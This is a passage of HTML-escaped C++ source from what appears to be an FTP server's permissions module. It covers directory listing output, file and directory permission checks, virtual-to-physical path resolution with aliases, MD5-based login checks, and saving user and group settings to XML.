		pResult-&gt;len = 0;
		pResult-&gt;pNext = NULL;
	}

	if (!enabledFacts || enabledFacts[0])
	{
		if (isDir)
		{
			memcpy(pResult-&gt;buffer + pResult-&gt;len, &quot;type=dir;&quot;, 9);
			pResult-&gt;len += 9;
		}
		else
		{
			memcpy(pResult-&gt;buffer + pResult-&gt;len, &quot;type=file;&quot;, 10);
			pResult-&gt;len += 10;
		}
	}

	// Adjust time zone info and output file date/time
	SYSTEMTIME sLocalTime;
	GetLocalTime(&amp;sLocalTime);
	FILETIME fTime;
	VERIFY(SystemTimeToFileTime(&amp;sLocalTime, &amp;fTime));

	FILETIME mtime;
	if (pTime)
		mtime = *pTime;
	else
		mtime = fTime;

	if (!enabledFacts || enabledFacts[2])
	{
		if (mtime.dwHighDateTime || mtime.dwLowDateTime)
		{
			SYSTEMTIME time;
			FileTimeToSystemTime(&amp;mtime, &amp;time);
			CStdStringA str;
			str.Format(&quot;modify=%04d%02d%02d%02d%02d%02d;&quot;,
				time.wYear,
				time.wMonth,
				time.wDay,
				time.wHour,
				time.wMinute,
				time.wSecond);

			memcpy(pResult-&gt;buffer + pResult-&gt;len, str.c_str(), str.GetLength());
			pResult-&gt;len += str.GetLength();
		}
	}

	if (!enabledFacts || enabledFacts[1])
	{
		if (!isDir)
			pResult-&gt;len += sprintf(pResult-&gt;buffer + pResult-&gt;len, &quot;size=%I64d;&quot;, size);
	}

	if (enabledFacts &amp;&amp; enabledFacts[fact_perm])
	{
		// TODO: a, d,f,p,r,w
		memcpy(pResult-&gt;buffer + pResult-&gt;len, &quot;perm=&quot;, 5);
		pResult-&gt;len += 5;
		if (isDir)
		{
			if (directory.bFileWrite)
				pResult-&gt;buffer[pResult-&gt;len++] = 'c';
			pResult-&gt;buffer[pResult-&gt;len++] = 'e';
			if (directory.bDirList)
				pResult-&gt;buffer[pResult-&gt;len++] = 'l';
			if (directory.bFileDelete || directory.bDirDelete)
				pResult-&gt;buffer[pResult-&gt;len++] = 'p';
		}
		else
		{
		}	
	}

	pResult-&gt;len += sprintf(pResult-&gt;buffer + pResult-&gt;len, &quot; %s\r\n&quot;, name);
}

void CPermissions::AddShortListingEntry(t_dirlisting *&amp;pResult, bool isDir, const char* name, const t_directory&amp; directory, __int64 size, FILETIME* pTime, const char* dirToDisplay, bool *)
{
	unsigned int nameLen = strlen(name);
	unsigned int dirToDisplayLen = strlen(dirToDisplay);

	// This wastes some memory but keeps the whole thing fast
	if ((8192 - pResult-&gt;len) &lt; (10 + nameLen + dirToDisplayLen))
	{
		pResult-&gt;pNext = new t_dirlisting;
		pResult = pResult-&gt;pNext;
		pResult-&gt;len = 0;
		pResult-&gt;pNext = NULL;
	}

	memcpy(pResult-&gt;buffer + pResult-&gt;len, dirToDisplay, dirToDisplayLen);
	pResult-&gt;len += dirToDisplayLen;
	memcpy(pResult-&gt;buffer + pResult-&gt;len, name, nameLen);
	pResult-&gt;len += nameLen;
	pResult-&gt;buffer[pResult-&gt;len++] = '\r';
	pResult-&gt;buffer[pResult-&gt;len++] = '\n';
}

int CPermissions::GetDirectoryListing(LPCTSTR username, CStdString currentDir, CStdString dirToDisplay,
									  t_dirlisting *&amp;pResult, CStdString&amp; physicalDir, 
									  CStdString&amp; logicalDir, void (*addFunc)(t_dirlisting *&amp;pResult, bool isDir, const char* name, const t_directory&amp; directory, __int64 size, FILETIME* pTime, const char* dirToDisplay, bool *enabledFacts),
									  bool useUTF8, bool *enabledFacts /*=0*/)
{
	// Get user
	CUser user;
	if (!GetUser(username, user))
		return PERMISSION_DENIED;

	CStdString dir = CanonifyServerDir(currentDir, dirToDisplay);
	if (dir == _T(&quot;&quot;))
		return PERMISSION_INVALIDNAME;
	logicalDir = dir;

	// Get directory from directory name
	t_directory directory;
	BOOL bTruematch;
	int res = GetRealDirectory(dir, user, directory, bTruematch);
	CStdString sFileSpec = _T(&quot;*&quot;); // Which files to list in the directory
	if (res == PERMISSION_FILENOTDIR || res == PERMISSION_NOTFOUND) // Try listing using a direct wildcard filespec instead?
	{
		// Check dirToDisplay if we are allowed to go back a directory
		dirToDisplay.Replace('\\', '/');
		while (dirToDisplay.Replace(_T(&quot;//&quot;), _T(&quot;/&quot;)));
		if (dirToDisplay.Right(1) == _T(&quot;/&quot;))
			return res;
		int pos = dirToDisplay.ReverseFind('/');
		if (res != PERMISSION_FILENOTDIR &amp;&amp; dirToDisplay.Mid(pos + 1).Find('*') == -1)
			return res;
		dirToDisplay = dirToDisplay.Left(pos + 1);

		if (dir == _T(&quot;/&quot;))
			return res;
		
		pos = dir.ReverseFind('/');
		sFileSpec = dir.Mid(pos + 1);
		if (pos)
			dir = dir.Left(pos);
		else
			dir = _T(&quot;/&quot;);

		if (sFileSpec.Find(_T(&quot;*&quot;)) == -1 &amp;&amp; res != PERMISSION_FILENOTDIR)
			return res;

		res = GetRealDirectory(dir, user, directory, bTruematch);
	}
	if (res)
		return res;

	// Check permissions
	if (!directory.bDirList)
		return PERMISSION_DENIED;

	TIME_ZONE_INFORMATION tzInfo;
	int tzRes = GetTimeZoneInformation(&amp;tzInfo);
	_int64 offset = tzInfo.Bias+((tzRes==TIME_ZONE_ID_DAYLIGHT)?tzInfo.DaylightBias:tzInfo.StandardBias);
	offset *= 60 * 10000000;

	if (dirToDisplay != _T(&quot;&quot;) &amp;&amp; dirToDisplay.Right(1) != _T(&quot;/&quot;))
		dirToDisplay += _T(&quot;/&quot;);

	t_dirlisting *pDir = new t_dirlisting;
	pDir-&gt;len = 0;
	pDir-&gt;pNext = NULL;
	pResult = pDir;

	char* dirToDisplayUTF8 = ConvertFilename(dirToDisplay, useUTF8);
	if (!dirToDisplayUTF8)
		return PERMISSION_DENIED;
		
	// List aliases in current directory
	for (std::multimap&lt;CStdString, CUser::t_alias&gt;::const_iterator iter = user.aliasMap.begin(); iter != user.aliasMap.end(); iter++)
	{
		if (iter-&gt;first.CompareNoCase(directory.dir))
			continue;

		t_directory directory;
		BOOL truematch = false;
		if (GetRealDirectory(dir + _T(&quot;/&quot;) + iter-&gt;second.name, user, directory, truematch))
			continue;
		if (!directory.bDirList)
			continue;
		if (!truematch &amp;&amp; !directory.bDirSubdirs)
			continue;

		if (sFileSpec != _T(&quot;*.*&quot;) &amp;&amp; sFileSpec != _T(&quot;*&quot;))
		{
			if (!WildcardMatch(iter-&gt;second.name, sFileSpec))
				continue;
		}

		char* name = ConvertFilename(iter-&gt;second.name, useUTF8);
		if (name)
		{
			addFunc(pDir, true, name, directory, 0, 0, dirToDisplayUTF8, enabledFacts);
			delete [] name;
		}
	}

	for (std::multimap&lt;CStdString, CStdString&gt;::const_iterator iter = user.virtualAliasNames.begin(); iter != user.virtualAliasNames.end(); iter++)
	{
		if (iter-&gt;first.CompareNoCase(dir))
			continue;

		t_directory directory;
		BOOL truematch = false;
		if (GetRealDirectory(dir + _T(&quot;/&quot;) + iter-&gt;second, user, directory, truematch))
			continue;
		if (!directory.bDirList)
			continue;
		if (!truematch &amp;&amp; !directory.bDirSubdirs)
			continue;

		if (sFileSpec != _T(&quot;*.*&quot;) &amp;&amp; sFileSpec != _T(&quot;*&quot;))
		{
			if (!WildcardMatch(iter-&gt;second, sFileSpec))
				continue;
		}

		char* name = ConvertFilename(iter-&gt;second, useUTF8);
		if (name)
		{
			addFunc(pDir, true, name, directory, 0, 0, dirToDisplayUTF8, enabledFacts);
			delete [] name;
		}
	}

	physicalDir = directory.dir;
    if (sFileSpec != _T(&quot;*&quot;) &amp;&amp; sFileSpec != _T(&quot;*.*&quot;))
		physicalDir += sFileSpec;

	WIN32_FIND_DATA FindFileData;
	WIN32_FIND_DATA NextFindFileData;
	HANDLE hFind;
	hFind = FindFirstFile(directory.dir + _T(&quot;\\&quot;) + sFileSpec, &amp;NextFindFileData);
	while (hFind != INVALID_HANDLE_VALUE)
	{
		FindFileData = NextFindFileData;
		if (!FindNextFile(hFind, &amp;NextFindFileData))
		{
			FindClose(hFind);
			hFind = INVALID_HANDLE_VALUE;
		}

		if (!_tcscmp(FindFileData.cFileName, _T(&quot;.&quot;)) || !_tcscmp(FindFileData.cFileName, _T(&quot;..&quot;)))
			continue;

		const CStdString&amp; fn = FindFileData.cFileName;
		
		if (FindFileData.dwFileAttributes &amp; FILE_ATTRIBUTE_DIRECTORY)
		{
			// Check permissions of subdir. If we don't have LIST permission,
			// don't display the subdir.
			BOOL truematch;
			t_directory subDir;
			if (GetRealDirectory(dir + _T(&quot;/&quot;) + fn, user, subDir, truematch))
				continue;

			if (subDir.bDirList)
			{
				char* utf8 = ConvertFilename(fn, useUTF8);
				if (!utf8)
					continue;
				addFunc(pDir, true, utf8, subDir, 0, &amp;FindFileData.ftLastWriteTime, dirToDisplayUTF8, enabledFacts);
				delete [] utf8;
			}
		}
		else
		{
			char* utf8 = ConvertFilename(fn, useUTF8);
			if (!utf8)
				continue;
			addFunc(pDir, false, utf8, directory, FindFileData.nFileSizeLow + ((_int64)FindFileData.nFileSizeHigh&lt;&lt;32), &amp;FindFileData.ftLastWriteTime, dirToDisplayUTF8, enabledFacts);
			delete [] utf8;
		}
	}

	delete [] dirToDisplayUTF8;

	return 0;
}

int CPermissions::CheckDirectoryPermissions(LPCTSTR username, CStdString dirname, CStdString currentdir, int op, CStdString&amp; physicalDir, CStdString&amp; logicalDir)
{
	//Get user from username
	CUser user;
	if (!GetUser(username, user))
		return PERMISSION_DENIED; // No user found

	CStdString dir = CanonifyServerDir(currentdir, dirname);
	if (dir == _T(&quot;&quot;))
		return PERMISSION_INVALIDNAME;
	if (dir == _T(&quot;/&quot;))
		return PERMISSION_NOTFOUND;

	int pos = dir.ReverseFind('/');
	if (pos == -1 || !dir[pos + 1])
		return PERMISSION_NOTFOUND;
	logicalDir = dir;
	dirname = dir.Mid(pos + 1);
	if (!pos)
		dir = _T(&quot;/&quot;);
	else
		dir = dir.Left(pos);
	
	// dir now is the absolute path (logical server path of course)
	// awhile dirname is the pure dirname without the full path

	CStdString realDir;
	CStdString realDirname;

	//Get the physical path, only of dir to get the right permissions
	t_directory directory;
	BOOL truematch;
	int res;

	CStdString dir2 = dir;
	CStdString dirname2 = dirname;
	do
	{
		res = GetRealDirectory(dir2, user, directory, truematch);
		if (res &amp; PERMISSION_NOTFOUND &amp;&amp; op == DOP_CREATE)
		{ //that path could not be found. Maybe more than one directory level has to be created, check that
			if (dir2 == _T(&quot;/&quot;))
				return res;

			int pos = dir2.ReverseFind('/');
			if (pos == -1)
				return res;

			dirname2 = dir2.Mid(pos+1) + _T(&quot;/&quot;) + dirname2;
			if (pos)
				dir2 = dir2.Left(pos);
			else
				dir2 = _T(&quot;/&quot;);

			continue;
		}
		else if (res)
			return res;
		
		realDir = directory.dir;
		realDirname = dirname2;
		if (!directory.bDirDelete &amp;&amp; op &amp; DOP_DELETE)
			res |= PERMISSION_DENIED;
		if (!directory.bDirCreate &amp;&amp; op &amp; DOP_CREATE)
			res |= PERMISSION_DENIED;
		break;
	} while (TRUE);

	realDirname.Replace(_T(&quot;/&quot;), _T(&quot;\\&quot;));
	physicalDir = realDir + _T(&quot;\\&quot;) + realDirname;

	//Check if dir + dirname is a valid path
	int res2 = GetRealDirectory(dir + _T(&quot;/&quot;) + dirname, user, directory, truematch);

	if (!res2)
		physicalDir = directory.dir;
	
	if (!res2 &amp;&amp; op&amp;DOP_CREATE)
		res |= PERMISSION_DOESALREADYEXIST;
	else if (!(res2 &amp; PERMISSION_NOTFOUND))
		return res | res2;

	// check dir attributes
	DWORD nAttributes = GetFileAttributes(physicalDir);
	if (nAttributes==0xFFFFFFFF &amp;&amp; !(op&amp;DOP_CREATE))
		res |= PERMISSION_NOTFOUND;
	else if (!(nAttributes&amp;FILE_ATTRIBUTE_DIRECTORY))
		res |= PERMISSION_FILENOTDIR;

	//Finally, a valid path+dirname!
	return res;
}

int CPermissions::CheckFilePermissions(LPCTSTR username, CStdString filename, CStdString currentdir, int op, CStdString&amp; physicalFile, CStdString&amp; logicalFile)
{
	//Get user from username
	CUser user;
	if (!GetUser(username, user))
		return PERMISSION_DENIED; // No user found

	CStdString dir = CanonifyServerDir(currentdir, filename);
	if (dir == _T(&quot;&quot;))
		return PERMISSION_INVALIDNAME;
	if (dir == _T(&quot;/&quot;))
		return PERMISSION_NOTFOUND;

	int pos = dir.ReverseFind('/');
	if (pos == -1)
		return PERMISSION_NOTFOUND;

	logicalFile = dir;
	
	filename = dir.Mid(pos + 1);
	if (pos)
		dir = dir.Left(pos);
	else
		dir = &quot;/&quot;;

	// dir now is the absolute path (logical server path of course)
	// while filename is the filename

	//Get the physical path
	t_directory directory;
	BOOL truematch;
	int res = GetRealDirectory(dir, user, directory, truematch);

	if (res)
		return res;
	if (!directory.bFileRead &amp;&amp; op&amp;FOP_READ)
		res |= PERMISSION_DENIED;
	if (!directory.bFileDelete &amp;&amp; op&amp;FOP_DELETE)
		res |= PERMISSION_DENIED;
	if (!directory.bFileWrite &amp;&amp; op&amp;(FOP_CREATENEW|FOP_WRITE|FOP_APPEND))
		res |= PERMISSION_DENIED;
	if ((!directory.bDirList || (!directory.bDirSubdirs &amp;&amp; !truematch)) &amp;&amp; op&amp;FOP_LIST)
		res |= PERMISSION_DENIED;

	physicalFile = directory.dir + &quot;\\&quot; + filename;
	DWORD nAttributes = GetFileAttributes(physicalFile);
	if (nAttributes == 0xFFFFFFFF)
	{
		if (!(op&amp;(FOP_WRITE|FOP_APPEND|FOP_CREATENEW)))
			res |= PERMISSION_NOTFOUND;
	}
	else
	{
		if (nAttributes&amp;FILE_ATTRIBUTE_DIRECTORY)
			res |= PERMISSION_DIRNOTFILE;
		if (!directory.bFileAppend &amp;&amp; op&amp;FOP_APPEND)
			res |= PERMISSION_DENIED;
		if (!directory.bFileDelete &amp;&amp; op&amp;FOP_WRITE)
			res |= PERMISSION_DENIED;
		if (op &amp; FOP_CREATENEW)
			res |= PERMISSION_DOESALREADYEXIST;
	}

	//If res is 0 we finally have a valid path+filename!
	return res;
}

CStdString CPermissions::GetHomeDir(const CUser &amp;user, bool physicalPath /*=false*/) const
{
	if (user.homedir == _T(&quot;&quot;))
		return _T(&quot;&quot;);

	if (!physicalPath)
		return _T(&quot;/&quot;);
	
	CStdString path;
	path = user.homedir;
	
	user.DoReplacements(path);
	
	return path;
}

CStdString CPermissions::GetHomeDir(LPCTSTR username, bool physicalPath /*=false*/) const
{
	CUser user;
	if (!GetUser(username, user))
		return _T(&quot;&quot;);

	return GetHomeDir(user, physicalPath);
}

int CPermissions::GetRealDirectory(CStdString directory, const CUser &amp;user, t_directory &amp;ret, BOOL &amp;truematch)
{
	/*
	 * This function translates pathnames from absolute server paths
	 * into absolute local paths.
	 * The given server directory is already an absolute canonified path, so
	 * parsing it is very quick.
	 * To find the absolute local path, we go though each segment of the server
	 * path. For the local path, we start form the homedir and append segments 
	 * sequentially or resolve aliases if required.
	 */

	directory.TrimLeft(_T(&quot;/&quot;));
	
	// Split server path
	// --------------------

	//Split dir into pieces
	std::list&lt;CStdString&gt; PathPieces;
	int pos;

	while((pos = directory.Find('/')) != -1)
	{
		PathPieces.push_back(directory.Left(pos));
		directory = directory.Mid(pos + 1);
	}
	if (directory != _T(&quot;&quot;))
		PathPieces.push_back(directory);

	// Get absolute local path
	// -----------------------

	//First get the home dir
	CStdString homepath = GetHomeDir(user, true);
	if (homepath == _T(&quot;&quot;)) //No homedir found
		return PERMISSION_DENIED;
	
	// Reassamble path to get local path
	CStdString path = homepath; // Start with homedir as root

	CStdString virtualPath = _T(&quot;/&quot;);
	// Go through all pieces
	for (std::list&lt;CStdString&gt;::const_iterator iter = PathPieces.begin(); iter != PathPieces.end(); iter++)
	{
		// Check if piece exists
		const CStdString&amp; piece = *iter;
		virtualPath += piece + _T(&quot;/&quot;);
		DWORD nAttributes = GetFileAttributes(path + _T(&quot;\\&quot;) + piece);
		if (nAttributes != 0xFFFFFFFF)
		{
			if (!(nAttributes &amp; FILE_ATTRIBUTE_DIRECTORY))
				return PERMISSION_FILENOTDIR;
			path += _T(&quot;\\&quot;) + piece;
			continue;
		}
		else
		{
			// Physical path did not exist, check aliases
			const CStdString&amp; target = user.GetAliasTarget(path, virtualPath, piece);

			if (target != _T(&quot;&quot;))
			{
				if (target.Right(1) != _T(&quot;:&quot;))
				{
					nAttributes = GetFileAttributes(target);
					if (nAttributes == 0xFFFFFFFF)
						return PERMISSION_NOTFOUND;
					else if (!(nAttributes &amp; FILE_ATTRIBUTE_DIRECTORY))
						return PERMISSION_FILENOTDIR;
				}
				path = target;
				continue;
			}

		}
		return PERMISSION_NOTFOUND;
	}
	const CStdString realpath = path;

	// Check permissions
	// -----------------

	/* We got a valid local path, now find the closest matching path within the
	 * permissions.
	 * We do this by sequentially comparing the path with all permissions and
	 * sequentially removing the last path segment until we found a match or
	 * all path segments have been removed
	 * Distinguish the case
	 */
	truematch = TRUE;
	
	while (path != _T(&quot;&quot;))
	{
		BOOL bFoundMatch = FALSE;
		unsigned int i;
	
		// Check user permissions
		for (i = 0; i &lt; user.permissions.size(); i++)
		{
			CStdString permissionPath = user.permissions[i].dir;
			user.DoReplacements(permissionPath);
			if (!permissionPath.CompareNoCase(path))
			{
				bFoundMatch = TRUE;
				ret = user.permissions[i];
				break;
			}
		}

		// Check owner (group) permissions
		if (!bFoundMatch &amp;&amp; user.pOwner)
			for (i = 0; i &lt; user.pOwner-&gt;permissions.size(); i++)
			{
				CStdString permissionPath = user.pOwner-&gt;permissions[i].dir;
				user.DoReplacements(permissionPath);
				if (!permissionPath.CompareNoCase(path))
				{
					bFoundMatch = TRUE;
					ret = user.pOwner-&gt;permissions[i];
					break;
				}
			}

		if (!bFoundMatch)
		{
			// No match found, remove last segment and try again
			int pos = path.ReverseFind('\\');
			if (pos != -1)
				path = path.Left(pos);
			else
				return PERMISSION_DENIED;
			truematch = FALSE;
			continue;
		}
		ret.dir = realpath;

		// We can check the bDirSubdirs permission right here
		if (!truematch &amp;&amp; !ret.bDirSubdirs)
			return PERMISSION_DENIED;

		return 0;
	}
	return PERMISSION_NOTFOUND;
}

int CPermissions::ChangeCurrentDir(LPCTSTR username, CStdString &amp;currentdir, CStdString &amp;dir)
{
	//Get user from username
	CUser user;
	if (!GetUser(username, user))
		return PERMISSION_DENIED; // No user found

	CStdString canonifiedDir = CanonifyServerDir(currentdir, dir);
	if (canonifiedDir == _T(&quot;&quot;))
		return PERMISSION_INVALIDNAME;
	dir = canonifiedDir;

	//Get the physical path
	t_directory directory;
	BOOL truematch;
	int res = GetRealDirectory(dir, user, directory, truematch);
	if (res)
		return res;
	if (!directory.bDirList)
	{
		if (!directory.bFileRead &amp;&amp; !directory.bFileWrite)
			return PERMISSION_DENIED;
	}

	//Finally, a valid path!
	currentdir = dir; //Server paths are relative, so we can use the absolute server path

	return 0;
}

BOOL CPermissions::GetUser(CStdString username, CUser &amp;userdata) const
{
	// Get user from username
	for (unsigned int i = 0; i &lt; m_UsersList.size(); i++)
	{
		if (!username.CompareNoCase(m_UsersList[i].user))
		{
			userdata = m_UsersList[i];
			return TRUE;
		}
	}
	return FALSE;
}

BOOL CPermissions::CheckUserLogin(LPCTSTR username, LPCTSTR pass, CUser &amp;userdata, BOOL noPasswordCheck /*=FALSE*/)
{
	const char *tmp = ConvToNetwork(pass);
	if (!tmp)
		return FALSE;

	MD5 md5;
	md5.update((unsigned char *)tmp, strlen(tmp));
	md5.finalize();
	char *res = md5.hex_digest();
	CStdString hash = res;
	delete [] res;
	delete [] tmp;

	CUser user;
	if (!GetUser(username, user))
		return FALSE;

	if (noPasswordCheck || user.password == hash || user.password == _T(&quot;&quot;))
	{
		userdata = user;
		return TRUE;
	}

	return FALSE;
}

void CPermissions::UpdateInstances()
{
	EnterCritSection(m_sync);
	for (std::list&lt;CPermissions *&gt;::iterator iter=m_sInstanceList.begin(); iter!=m_sInstanceList.end(); iter++)
	{
		if (*iter != this)
		{
			ASSERT((*iter)-&gt;m_pPermissionsHelperWindow);
			::PostMessage((*iter)-&gt;m_pPermissionsHelperWindow-&gt;GetHwnd(), WM_USER, 0, 0);
		}
	}
	LeaveCritSection(m_sync);
}

void CPermissions::SetKey(TiXmlElement *pXML, LPCTSTR name, LPCTSTR value)
{
	ASSERT(pXML);
	TiXmlElement* pOption = new TiXmlElement(&quot;Option&quot;);
	pOption-&gt;SetAttribute(&quot;Name&quot;, ConvToNetwork(name));
	XML::SetText(pOption, value);
	pXML-&gt;LinkEndChild(pOption);
}

void CPermissions::SetKey(TiXmlElement *pXML, LPCTSTR name, int value)
{
	ASSERT(pXML);
	CStdString str;
	str.Format(_T(&quot;%d&quot;), value);
	SetKey(pXML, name, str);
}

void CPermissions::SavePermissions(TiXmlElement *pXML, const t_group &amp;user)
{
	TiXmlElement* pPermissions = new TiXmlElement(&quot;Permissions&quot;);
	pXML-&gt;LinkEndChild(pPermissions);

	for (unsigned int i=0; i &lt; user.permissions.size(); i++)
	{
		TiXmlElement* pPermission = new TiXmlElement(&quot;Permission&quot;);
		pPermissions-&gt;LinkEndChild(pPermission);

		pPermission-&gt;SetAttribute(&quot;Dir&quot;, ConvToNetwork(user.permissions[i].dir));
		if (!user.permissions[i].aliases.empty())
		{
			TiXmlElement* pAliases = new TiXmlElement(&quot;Aliases&quot;);
			pPermission-&gt;LinkEndChild(pAliases);
			for (std::list&lt;CStdString&gt;::const_iterator iter = user.permissions[i].aliases.begin(); iter != user.permissions[i].aliases.end(); iter++)
			{
				TiXmlElement *pAlias = new TiXmlElement(&quot;Alias&quot;);
				XML::SetText(pAlias, *iter);
				pAliases-&gt;LinkEndChild(pAlias);
			}
		}
		SetKey(pPermission, _T(&quot;FileRead&quot;), user.permissions[i].bFileRead ? _T(&quot;1&quot;):_T(&quot;0&quot;));
		SetKey(pPermission, _T(&quot;FileWrite&quot;), user.permissions[i].bFileWrite ? _T(&quot;1&quot;):_T(&quot;0&quot;));
		SetKey(pPermission, _T(&quot;FileDelete&quot;), user.permissions[i].bFileDelete ?_T(&quot;1&quot;):_T(&quot;0&quot;));
		SetKey(pPermission, _T(&quot;FileAppend&quot;), user.permissions[i].bFileAppend ? _T(&quot;1&quot;):_T(&quot;0&quot;));
		SetKey(pPermission, _T(&quot;DirCreate&quot;), user.permissions[i].bDirCreate ? _T(&quot;1&quot;):_T(&quot;0&quot;));
		SetKey(pPermission, _T(&quot;DirDelete&quot;), user.permissions[i].bDirDelete ? _T(&quot;1&quot;):_T(&quot;0&quot;));
		SetKey(pPermission, _T(&quot;DirList&quot;), user.permissions[i].bDirList ? _T(&quot;1&quot;):_T(&quot;0&quot;));
		SetKey(pPermission, _T(&quot;DirSubdirs&quot;), user.permissions[i].bDirSubdirs ? _T(&quot;1&quot;):_T(&quot;0&quot;));
		SetKey(pPermission, _T(&quot;IsHome&quot;), user.permissions[i].bIsHome ? _T(&quot;1&quot;):_T(&quot;0&quot;));
		SetKey(pPermission, _T(&quot;AutoCreate&quot;), user.permissions[i].bAutoCreate ? _T(&quot;1&quot;):_T(&quot;0&quot;));
	}
}

BOOL CPermissions::GetAsCommand(char **pBuffer, DWORD *nBufferLength)
{
	// This function returns all account data as a command string which will be 
	// sent to the user interface.
	if (!pBuffer || !nBufferLength)
		return FALSE;

	EnterCritSection(m_sync);

	// First calculate the required buffer length
	DWORD len = 4;
	t_GroupsList::iterator groupiter;
	for (groupiter = m_sGroupsList.begin(); groupiter != m_sGroupsList.end(); groupiter++)
		len += groupiter-&gt;GetRequiredBufferLen();

	t_UsersList::iterator iter;
	for (iter = m_sUsersList.begin(); iter != m_sUsersList.end(); iter++)
		len += iter-&gt;GetRequiredBufferLen();

	// Allocate memory
	*pBuffer = new char[len];
	char* p  = *pBuffer;

	// Write groups to buffer
	*p++ = m_sGroupsList.size()/256;
	*p++ = m_sGroupsList.size()%256;
	for (groupiter = m_sGroupsList.begin(); groupiter != m_sGroupsList.end(); groupiter++)
	{
		p = groupiter-&gt;FillBuffer(p);
		if (!p)
		{
			delete [] *pBuffer;
			*pBuffer = NULL;
			LeaveCritSection(m_sync);
			return FALSE;
		}
	}

	// Write users to buffer
	*p++ = m_sUsersList.size()/256;
	*p++ = m_sUsersList.size()%256;
	for (iter = m_sUsersList.begin(); iter != m_sUsersList.end(); iter++)
	{
		p = iter-&gt;FillBuffer(p);
		if (!p)
		{
			delete [] *pBuffer;
			*pBuffer = NULL;
			LeaveCritSection(m_sync);
			return FALSE;
		}
	}

	LeaveCritSection(m_sync);
	*nBufferLength = len;

	return TRUE;
}

BOOL CPermissions::ParseUsersCommand(unsigned char *pData, DWORD dwDataLength)
{
	m_GroupsList.clear();
	m_UsersList.clear();
	unsigned char *p = pData;
	unsigned char* endMarker = pData + dwDataLength;

	if (dwDataLength &lt; 2)
		return FALSE;
	int num = *p * 256 + p[1];
	p+=2;

	int i;
	for (i = 0; i &lt; num; i++)
	{
		t_group group;
		p = group.ParseBuffer(p, endMarker - p);
		if (!p)
			return FALSE;
	
		if (group.group != _T(&quot;&quot;))
		{
			//Set a home dir if no home dir could be read
			BOOL bGotHome = FALSE;
			for (unsigned int dir = 0; dir &lt; group.permissions.size(); dir++)
				if (group.permissions[dir].bIsHome)
				{
					bGotHome = TRUE;
					break;
				}

			if (!bGotHome &amp;&amp; !group.permissions.empty())
				group.permissions.begin()-&gt;bIsHome = TRUE;

			m_GroupsList.push_back(group);
		}
	}

	if ((endMarker - p) &lt; 2)
		return FALSE;

	num = *p * 256 + p[1];
	p+=2;
	for (i = 0; i &lt; num; i++)
	{
		CUser user;
	
		p = user.ParseBuffer(p, endMarker - p);
		if (!p)
			return FALSE;
	
		if (user.user != _T(&quot;&quot;))
		{
			user.pOwner = NULL;
			if (user.group != _T(&quot;&quot;))
			{
				for (t_GroupsList::iterator groupiter = m_GroupsList.begin(); groupiter != m_GroupsList.end(); groupiter++)
					if (groupiter-&gt;group == user.group)
					{
						user.pOwner = &amp;(*groupiter);
						break;
					}
				if (!user.pOwner)
					user.group = _T(&quot;&quot;);
			}

			if (!user.pOwner)
			{
				//Set a home dir if no home dir could be read
				BOOL bGotHome = FALSE;
				for (unsigned int dir = 0; dir &lt; user.permissions.size(); dir++)
					if (user.permissions[dir].bIsHome)
					{
						bGotHome = TRUE;
						break;
					}

				if (!bGotHome &amp;&amp; !user.permissions.empty())
					user.permissions.begin()-&gt;bIsHome = TRUE;
			}

			std::vector&lt;t_directory&gt;::iterator iter;
			for (iter = user.permissions.begin(); iter != user.permissions.end(); iter++)
			{
				if (iter-&gt;bIsHome)
				{
					user.homedir = iter-&gt;dir;
					break;
				}
			}
			if (user.homedir == _T(&quot;&quot;) &amp;&amp; user.pOwner)
			{
				for (iter = user.pOwner-&gt;permissions.begin(); iter != user.pOwner-&gt;permissions.end(); iter++)
				{
					if (iter-&gt;bIsHome)
					{
						user.homedir = iter-&gt;dir;
						break;
					}
				}
			}

			user.PrepareAliasMap();
			m_UsersList.push_back(user);
		}
	}

	// Update the account list
	EnterCritSection(m_sync);

	m_sGroupsList.clear();
	for (t_GroupsList::const_iterator groupiter=m_GroupsList.begin(); groupiter!=m_GroupsList.end(); groupiter++)
		m_sGroupsList.push_back(*groupiter);

	m_sUsersList.clear();
	for (t_UsersList::const_iterator iter=m_UsersList.begin(); iter!=m_UsersList.end(); iter++)
		m_sUsersList.push_back(*iter);

	UpdateInstances();

	LeaveCritSection(m_sync);

	// Write the new account data into xml file

	TiXmlElement *pXML = COptions::GetXML();
	if (!pXML)
		return FALSE;

	TiXmlElement* pGroups;
	while ((pGroups = pXML-&gt;FirstChildElement(&quot;Groups&quot;)))
		pXML-&gt;RemoveChild(pGroups);
	pGroups = new TiXmlElement(&quot;Groups&quot;);
	pXML-&gt;LinkEndChild(pGroups);

	//Save the changed user details
	for (t_GroupsList::const_iterator groupiter=m_GroupsList.begin(); groupiter!=m_GroupsList.end(); groupiter++)
	{
		TiXmlElement* pGroup = new TiXmlElement(&quot;Group&quot;);
		pGroups-&gt;LinkEndChild(pGroup);
		
		pGroup-&gt;SetAttribute(&quot;Name&quot;, ConvToNetwork(groupiter-&gt;group));

		SetKey(pGroup, _T(&quot;Bypass server userlimit&quot;), groupiter-&gt;nBypassUserLimit);
		SetKey(pGroup, _T(&quot;User Limit&quot;), groupiter-&gt;nUserLimit);
		SetKey(pGroup, _T(&quot;IP Limit&quot;), groupiter-&gt;nIpLimit);
		SetKey(pGroup, _T(&quot;Enabled&quot;), groupiter-&gt;nEnabled);
		SetKey(pGroup, _T(&quot;Comments&quot;), groupiter-&gt;comment);
		SetKey(pGroup, _T(&quot;ForceSsl&quot;), groupiter-&gt;forceSsl);

		SaveIpFilter(pGroup, *groupiter);		
		SavePermissions(pGroup, *groupiter);
		SaveSpeedLimits(pGroup, *groupiter);
	}

	TiXmlElement* pUsers;
	while ((pUsers = pXML-&gt;FirstChildElement(&quot;Users&quot;)))
		pXML-&gt;RemoveChild(pUsers);
	pUsers = new TiXmlElement(&quot;Users&quot;);
	pXML-&gt;LinkEndChild(pUsers);

	//Save the changed user details
	for (t_UsersList::const_iterator iter=m_UsersList.begin(); iter!=m_UsersList.end(); iter++)
	{
		TiXmlElement* pUser = new TiXmlElement(&quot;User&quot;);
		pUsers-&gt;LinkEndChild(pUser);
		
		pUser-&gt;SetAttribute(&quot;Name&quot;, ConvToNetwork(iter-&gt;user));

		SetKey(pUser, _T(&quot;Pass&quot;), iter-&gt;password);
		SetKey(pUser, _T(&quot;Group&quot;), iter-&gt;group);
		SetKey(pUser, _T(&quot;Bypass server userlimit&quot;), iter-&gt;nBypassUserLimit);
		SetKey(pUser, _T(&quot;User Limit&quot;), iter-&gt;nUserLimit);
		SetKey(pUser, _T(&quot;IP Limit&quot;), iter-&gt;nIpLimit);
